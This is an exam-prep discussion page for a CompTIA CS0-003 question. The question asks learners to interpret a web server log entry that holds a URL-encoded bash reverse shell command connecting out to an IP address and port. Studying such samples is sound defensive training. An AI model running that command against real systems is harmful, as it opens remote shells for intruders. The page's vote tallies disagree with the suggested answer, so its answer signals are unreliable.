ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam CS0-003 All Questions

View all questions & answers for the CS0-003 exam
Go to Exam

Exam CS0-003 topic 1 question 476 discussion

Actual exam question from CompTIA's CS0-003
Question #: 476
Topic #: 1
[All CS0-003 Questions]

A security analyst identifies the following log entry in the web server logs:

10.203.10.23 - - [22/May/2024 11:06:29] "GET /admin?cmd=bash+-i+>%26+/dev/tcp/10.20.10.22/1234+0%3E%261 http/1.1" 200 -

Which of the following best explains the log entry?

  • A. This was caused by an administrator logging in to a website using the command line.
  • B. This is a successful lateral movement abusing an RCE vulnerability.
  • C. This is a failed attack attempting to exploit an LFI vulnerability.
  • D. This was caused by a successful RFI vulnerability exploitation.
Show Suggested Answer Hide Answer
Suggested Answer: B 🗳️
by Stooshmeister at Aug. 13, 2025, 6:57 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
Stooshmeister
6 days, 14 hours ago
Selected Answer: B
Leaning toward B, but I'd be interested to hear arguments for the others.
upvoted 1 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel